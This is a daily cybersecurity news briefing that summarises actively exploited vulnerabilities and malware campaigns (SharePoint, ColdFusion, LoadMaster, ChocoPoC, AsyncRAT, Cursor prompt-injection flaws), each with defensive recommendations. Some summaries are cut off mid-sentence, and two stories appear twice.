Cybersecurity Daily Briefing: July 02, 2026

Coverage: Last 24 hours

Today’s Highlights

This 24h cycle spotlights ongoing risks from unpatched and actively exploited software vulnerabilities, including new high-severity bugs in SharePoint, Progress Kemp LoadMaster, and Adobe ColdFusion, as well as attacker innovation in supply chain and social engineering channels targeting practitioners and end users alike. Themes for today include exploitation of enterprise infrastructure, the use of supply chain and social engineering to target defenders themselves, abuse of trusted SaaS and remote tools for malware delivery, and the imperative for immediate patching on widely-deployed systems.

Table of Contents

  1. SharePoint RCE (CVE‑2026‑45659) added to CISA KEV after active exploitation
  2. Adobe Patches 7 CVSS 10.0 Flaws in ColdFusion and Campaign Classic
  3. Progress Kemp LoadMaster Pre-Auth RCE Flaw Faces Active Exploitation Attempts
  4. New ChocoPoC RAT Targets Vulnerability Researchers via Fake PoC Exploit Repos
  5. Unpatched Argo CD Repo-Server Flaw Could Let Attackers Take Over Kubernetes Clusters
  6. 19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges
  7. SEO-Poisoned Software Sites Abuse ScreenConnect to Deploy AsyncRAT
  8. VEIL#DROP Malware Chain Uses Blogger Platform to Deliver PureLogs Stealer
  9. Ousaban Banking Trojan Targets Iberian Bank Users with Fake PDF Lures
  10. Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands

Top Stories


SharePoint RCE (CVE‑2026‑45659) added to CISA KEV after active exploitation

Source: The Hacker News | Risk: Critical | Impacted: SharePoint administrators, Internal collaboration system owners, Enterprise compliance teams

Summary: CISA has added CVE‑2026‑45659, a high‑severity SharePoint remote code execution flaw (CVSS 8.8), to its Known Exploited Vulnerabilities catalog based on evidence of active exploitation.

Why it matters: Successful exploitation of an actively abused SharePoint RCE flaw may provide attackers direct access to sensitive data and an entry point for lateral movement across intranets.

Practitioner Perspective

With CVE‑2026‑45659 now listed in CISA KEV and confirmed as being exploited in the wild, organizations running SharePoint, especially those exposed to the internet, must move this patch to the top of their queue. The window between exploitation and detection on SharePoint servers can be narrow, and once compromised, attackers often deploy web shells or pivot quickly to critical business data. Evidence of compromise must be prioritized over mere patch compliance.

Recommended Actions

  • Patch all SharePoint servers for CVE-2026-45659 immediately, including those internal to the domain
  • Search for indicators of compromise (web shells, new admin accounts, unexpected outbound traffic) on servers that could have been exposed prior to patching

Adobe Patches 7 CVSS 10.0 Flaws in ColdFusion and Campaign Classic

Source: The Hacker News | Risk: Critical | Impacted: ColdFusion application owners, Marketing teams using Campaign Classic, Public-facing web application operators

Summary: Adobe has released patches for multiple maximum-severity security flaws impacting Adobe ColdFusion and Adobe Campaign Classic. The ColdFusion updates “resolves critical and important vulnerabilities that could lead to arbitrary code execution, privilege escalation, arbitrary file system read, and security feature bypass,” Adobe said in an alert released Tuesday. The vulnerabilities are listed.

Why it matters: Critical vulnerabilities in business-critical Adobe software could allow remote code execution and privilege escalation, putting sensitive systems and customer data at immediate risk.

Practitioner Perspective

Organizations running Adobe ColdFusion and Campaign Classic face seven CVSS 10.0 vulnerabilities offering attackers multiple avenues for complete system compromise. Until patched, exposed instances serve as prime targets for mass scanning and ransomware operators. Realistically, unmanaged or forgotten application servers are most at risk, but even well-maintained environments must prioritize these updates. This is classic attack surface management: instant response to vendor advisories is non-negotiable.

Recommended Actions

  • Deploy all relevant Adobe ColdFusion and Campaign Classic updates addressing the 7 CVSS 10.0 flaws released on July 2, 2026
  • Uncover and inventory all ColdFusion and Campaign Classic instances, including those outside standard IT control

Progress Kemp LoadMaster Pre-Auth RCE Flaw Faces Active Exploitation Attempts

Source: The Hacker News | Risk: Critical | Impacted: Network infrastructure teams, Organizations with public-facing Progress Kemp LoadMasters, Hybrid cloud network operators

Summary: A recently disclosed critical security flaw impacting Progress Kemp LoadMaster is seeing active exploitation attempts, according to an advisory from eSentire’s Threat Response Unit (TRU). The Canadian cybersecurity company said it identified exploitation attempts targeting CVE-2026-8037 (CVSS score: 9.6), an operating system (OS) command injection flaw that could be exploited to achieve.

Why it matters: Active exploitation of an unauthenticated command injection vulnerability in a widely deployed load balancer creates a high risk of disruptive or covert compromise, especially in environments with exposed management interfaces.

Practitioner Perspective

Enterprises using Progress Kemp LoadMaster appliances must assume that attackers are actively scanning for CVE-2026-8037 and will exploit unpatched devices with exposed management ports. Since this offers pre-authentication remote code execution, incident response teams should treat exposed systems as potentially breached until proven otherwise. Load balancers are often overlooked within security operations, making them an attractive initial access point for attackers aiming for lateral movement. Risk appetite should be zero for delayed remediation.

Recommended Actions

  • Immediately deploy the vendor patch for CVE-2026-8037 to all Progress Kemp LoadMaster instances
  • Identify and restrict network exposure of all LoadMaster management interfaces to trusted IPs only

Emerging Signals


New ChocoPoC RAT Targets Vulnerability Researchers via Fake PoC Exploit Repos

Source: The Hacker News | Risk: High | Impacted: Vulnerability researchers, Red/purple team operators, Security automation engineers

Summary: Attackers are hiding a data-stealing trojan inside fake exploit code aimed at the people who hunt bugs for a living. The malware, called ChocoPoC, travels in Python proof-of-concept (PoC) repositories on GitHub that claim to exploit hot new CVEs. Run one, and it quietly lifts your saved passwords, browser cookies, and files, then hands the attacker a shell on your.

Why it matters: Malicious PoC repositories deliver remote access tools that can exfiltrate credentials and project data, putting both individual researchers and the organizations they serve at direct risk.

Practitioner Perspective

Vulnerability researchers and application security teams, especially those integrating third-party PoCs or automation scripts, are prime targets here. Threat actors recognize the growing reliance on public exploit code and are actively poisoning GitHub repositories with loaders and RATs like ChocoPoC. This attack narrows the gap between research and compromise: an unvetted script can quickly escalate from a local credential theft to granting persistent attacker access. Security teams must treat public PoCs, especially those exploiting new CVEs, as potentially hostile and rethink how they validate and sandbox code before execution.

Recommended Actions

  • Isolate and analyze all downloaded PoCs for new CVEs in disposable VMs before any use on production or research endpoints
  • Hunt for ChocoPoC RAT activity such as abnormal Python processes, connections to known C2 infrastructure, and unexpected credential access on systems used for exploit testing

Unpatched Argo CD Repo-Server Flaw Could Let Attackers Take Over Kubernetes Clusters

Source: The Hacker News | Risk: High | Impacted: Kubernetes operators, DevOps teams, CI/CD platform owners

Summary: Argo CD, a widely used tool for deploying software to Kubernetes, has an unpatched flaw in its repo-server component that lets an unauthenticated attacker run code, provided they can reach the component’s internal network port. Synacktiv, which found the bug, says it can lead to a full cluster takeover. There is no fix and no CVE. The firm says it.

Why it matters: A widely used software deployment platform remains vulnerable to internal RCE, creating an opportunity for lateral movement or full Kubernetes cluster compromise in CI/CD environments.

Practitioner Perspective

Any organization deploying Argo CD should treat this as a top-of-mind service-side risk, especially as there is no CVE or vendor patch yet. If repo-server’s internal port is accessible via misconfiguration or lateral movement, even unauthenticated attackers can seize control, jeopardizing all workloads. Unpatched devops and CI/CD platforms like Argo CD are frequent pivots in real-world supply chain attacks. Until an official update is published, minimizing repo-server exposure on networks and scrutinizing cluster communications is critical.

Recommended Actions

  • Restrict network access to the Argo CD repo-server internal port to only trusted components
  • Review firewall rules and segmentation for any CI/CD infrastructure that could reach repo-server

19-Year-Old Scattered Spider Suspect Extradited to Face U.S. Hacking Charges

Source: The Hacker News | Risk: Medium | Impacted: Corporate IT environments, Large enterprises, SOC analysts monitoring for social engineering

Summary: A teenager accused of belonging to the hacking group Scattered Spider has been extradited from Finland to face U.S. charges of conspiracy, computer intrusion, and fraud, the U.S. Department of Justice announced on July 1. Peter Stokes, 19, a dual U.S. and Estonian citizen, appeared in a Chicago federal court on June 30, where a judge ordered him held in custody. Finnish.

Why it matters: The extradition underscores ongoing legal action against members of active, high-impact threat groups, which may disrupt but will not deter broader affiliate-driven operations targeting enterprises.

Practitioner Perspective

While the arrest of a Scattered Spider member is notable, the group’s decentralized nature means organizations should remain on high alert for ongoing activity by other affiliates. These actors favor social engineering and abuse of remote access into enterprise systems. Expect continued phishing, callback scams, and TTPs designed to bypass MFA and pivot into high-value SaaS or cloud platforms. Defensive focus should remain on identity security and rapid detection of credential misuse, not just on tracking specific individuals.

Recommended Actions

  • Reinforce user security awareness, emphasizing current Scattered Spider TTPs like callback phishing
  • Hunt for signs of lateral movement and MFA bypass in admin and cloud login logs

SEO-Poisoned Software Sites Abuse ScreenConnect to Deploy AsyncRAT

Source: The Hacker News | Risk: High | Impacted: Corporate desktops, Managed workstations, IT helpdesks

Summary: Unknown threat actors are leveraging the ScreenConnect remote access tool as a way to deploy and execute AsyncRAT. Kaspersky said the activity is part of a “massive, multi-domain, multi-language” campaign that distributes malicious installer archives hosted on spoofed websites. These installers masquerade as popular software like OBS Studio, DNS Jumper, DS4Windows, and Bandicam, among others.

Why it matters: Malware distributed through SEO-manipulated installer sites exploits user trust and can evade standard email-based controls, expanding the delivery surface for AsyncRAT and persistent access.

Practitioner Perspective

IT staff and end users searching for legitimate software like OBS Studio or DNS Jumper are being lured onto convincingly spoofed download sites, where installers instead deliver AsyncRAT via ScreenConnect. SEO poisoning means endpoints can be compromised outside traditional phishing vectors, reducing the effectiveness of perimeter controls. This technique shifts initial access to the user’s browser and download behaviors. Security teams need active detection for both AsyncRAT and unexpected use of ScreenConnect, particularly in user environments with local install rights.

Recommended Actions

  • Block or strictly monitor outbound ScreenConnect connections from endpoints not managed by IT
  • Deploy EDR detections for AsyncRAT signatures and command-and-control activity

VEIL#DROP Malware Chain Uses Blogger Platform to Deliver PureLogs Stealer

Source: The Hacker News | Risk: Medium | Impacted: Small business and enterprise end users, Staff with browser-saved credentials, Organizations with weak web filtering

Summary: Cybersecurity researchers have flagged a new multi-stage malware delivery attack chain that uses social engineering and Blogger pages to deliver an information stealer called PureLogs. The activity has been codenamed VEIL#DROP by Securonix. It’s suspected that the initial payloads are distributed either via spear-phishing or a drive-by compromise, which occurs when an unsuspecting user lands on.

Why it matters: Browser-based delivery via social engineering and cloud hosting services enables attackers to bypass many legacy security layers and directly target user credentials and browser-stored secrets.

Practitioner Perspective

Attackers are abusing Google’s Blogger platform to serve multi-stage malware, with initial infection vectors linked to spear-phishing or drive-by web visits. The PureLogs stealer extracts sensitive browser data, posing risks for business email compromise and access token theft. This demonstrates ongoing threat actor adaptation: trusted platforms like Blogger are again viable malware delivery vectors, and targeted users may be unaware of compromise. Detection must focus on endpoint telemetry and cloud-based web filtering attuned to malicious Blogger domains.

Recommended Actions

  • Expand web filtering policies to block access to known malicious Blogger domains and file downloads
  • Enable browser and EDR telemetry to alert on non-corporate binaries dropped from Blogger pages

Ousaban Banking Trojan Targets Iberian Bank Users with Fake PDF Lures

Source: The Hacker News | Risk: Medium | Impacted: Iberian financial institutions, Windows endpoint users in Spain/Portugal, Corporate finance and treasury staff

Summary: A Brazilian banking trojan called Ousaban is going after Windows users who bank in Spain and Portugal. Fortinet’s FortiGuard Labs identified the campaign in May 2026. It opens with a phishing PDF disguised as a corrupted file, checks that the visitor is really in Spain or Portugal, and hides its real payload inside an image. The goal is the usual one: steal.

Why it matters: Targeted banking malware campaigns increase the threat to financial accounts of users in specific geographies, amplifying the operational risk for institutions serving those markets.

Practitioner Perspective

The Ousaban Trojan is specifically targeting Windows users in Spain and Portugal with polymorphic attachments designed to evade basic email filtering and geo-based payload gating. For any organization with local presence or customers in these regions, credential theft may directly enable fraud or lateral attacks into corporate banking systems. Security teams need more than generic anti-malware to disrupt localized campaigns relying on language and regional checks. Critical controls include geo-targeted phishing defense and account activity monitoring.

Recommended Actions

  • Deploy advanced phishing controls tuned for Spanish and Portuguese lures attached as PDFs
  • Monitor regional login activity for anomalous banking sessions and credential reuse

Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands

Source: The Hacker News | Risk: High | Impacted: Development teams using Cursor, Source code repository owners, Software supply chain defenders

Summary: Two flaws in Cursor, an AI code editor, could let a single, ordinary-looking prompt break out of the editor’s safety sandbox and run any command on a developer’s computer. There is no click to fall for and no approval box to ignore. Cato AI Labs found the pair and named them DuneSlide. They are tracked as CVE-2026-50548 and CVE-2026-50549, both rated 9.8 out of.

Why it matters: Flaws in AI-based developer tooling create novel attack paths for code execution on developer endpoints, likely compromising source code, credentials, and supply chain artifacts.

Practitioner Perspective

Cursor, the AI-driven code editor, contains two critical vulnerabilities (CVE-2026-50548 and CVE-2026-50549) that allow prompts to escape sandboxing and run arbitrary commands. This means malicious prompt content alone can compromise developer machines silently. Given the current reliance on such AI tools for code review and generation, these flaws could facilitate automated supply chain attacks deep in the SDLC. Any organization trialing or deploying Cursor must act fast to eliminate usage until a patch is available and review endpoint posture on developer systems.

Recommended Actions

  • Halt all use of Cursor AI code editor until fixes for CVE-2026-50548 and CVE-2026-50549 are verified and deployed
  • Audit developer endpoint telemetry for unexplained command execution traceable to Cursor sessions

Exploits & CVEs


New ChocoPoC RAT Targets Vulnerability Researchers via Fake PoC Exploit Repos

Source: The Hacker News | Risk: High | Impacted: Vulnerability researchers, Red/purple team operators, Security automation engineers

Summary: Attackers are hiding a data-stealing trojan inside fake exploit code aimed at the people who hunt bugs for a living. The malware, called ChocoPoC, travels in Python proof-of-concept (PoC) repositories on GitHub that claim to exploit hot new CVEs. Run one, and it quietly lifts your saved passwords, browser cookies, and files, then hands the attacker a shell on your.

Why it matters: Malicious PoC repositories deliver remote access tools that can exfiltrate credentials and project data, putting both individual researchers and the organizations they serve at direct risk.

Practitioner Perspective

Vulnerability researchers and application security teams, especially those integrating third-party PoCs or automation scripts, are prime targets here. Threat actors recognize the growing reliance on public exploit code and are actively poisoning GitHub repositories with loaders and RATs like ChocoPoC. This attack narrows the gap between research and compromise: an unvetted script can quickly escalate from a local credential theft to granting persistent attacker access. Security teams must treat public PoCs, especially those exploiting new CVEs, as potentially hostile and rethink how they validate and sandbox code before execution.

Recommended Actions

  • Isolate and analyze all downloaded PoCs for new CVEs in disposable VMs before any use on production or research endpoints
  • Hunt for ChocoPoC RAT activity such as abnormal Python processes, connections to known C2 infrastructure, and unexpected credential access on systems used for exploit testing

Progress Kemp LoadMaster Pre-Auth RCE Flaw Faces Active Exploitation Attempts

Source: The Hacker News | Risk: Critical | Impacted: Network infrastructure teams, Organizations with public-facing Progress Kemp LoadMasters, Hybrid cloud network operators

Summary: A recently disclosed critical security flaw impacting Progress Kemp LoadMaster is seeing active exploitation attempts, according to an advisory from eSentire’s Threat Response Unit (TRU). The Canadian cybersecurity company said it identified exploitation attempts targeting CVE-2026-8037 (CVSS score: 9.6), an operating system (OS) command injection flaw that could be exploited to achieve.

Why it matters: Active exploitation of an unauthenticated command injection vulnerability in a widely deployed load balancer creates a high risk of disruptive or covert compromise, especially in environments with exposed management interfaces.

Practitioner Perspective

Enterprises using Progress Kemp LoadMaster appliances must assume that attackers are actively scanning for CVE-2026-8037 and will exploit unpatched devices with exposed management ports. Since this offers pre-authentication remote code execution, incident response teams should treat exposed systems as potentially breached until proven otherwise. Load balancers are often overlooked within security operations, making them an attractive initial access point for attackers aiming for lateral movement. Risk appetite should be zero for delayed remediation.

Recommended Actions

  • Immediately deploy the vendor patch for CVE-2026-8037 to all Progress Kemp LoadMaster instances
  • Identify and restrict network exposure of all LoadMaster management interfaces to trusted IPs only

Defensive Actions

  • Patch all SharePoint servers for CVE-2026-45659 immediately, including internal servers
  • Deploy all security updates for Adobe ColdFusion and Campaign Classic addressing July 2026 CVSS 10.0 flaws
  • Immediately patch Progress Kemp LoadMaster appliances for CVE-2026-8037 and restrict their management interfaces
  • Isolate and verify all PoCs for new CVEs in contained VMs prior to use on production or sensitive endpoints
  • Restrict network access to Argo CD repo-server and review segmentation in CI/CD environments
  • Hunt for signs of ChocoPoC RAT (abnormal Python processes, credential access) on research and security endpoints
  • Enable EDR detections for AsyncRAT and ScreenConnect command-and-control activity on user machines
  • Expand phishing and web filtering tailored to region/language context where targeted malware campaigns are active
  • Audit software asset inventories to uncover ColdFusion/Campaign Classic servers outside normal IT visibility
  • Reinforce user security awareness, especially regarding tactics employed by groups like Scattered Spider

What We’re Watching

Defenders should keep close attention on patch compliance for high-severity vulnerabilities affecting SharePoint, Adobe business platforms, and Progress Kemp LoadMaster, all of which are facing active exploitation in enterprise environments. Campaigns leveraging SEO poisoning for malware delivery, as well as attacker focus on poisoning exploit proof-of-concept code, represent rapidly evolving methods aimed at both security practitioners and end users. Watch for additional advisories on interim mitigations for Argo CD and further developments in high-profile threat actor arrests and their operational changes.



Categories: Cybersecurity Blog, Cybersecurity News

Tags: , , , ,

Leave a comment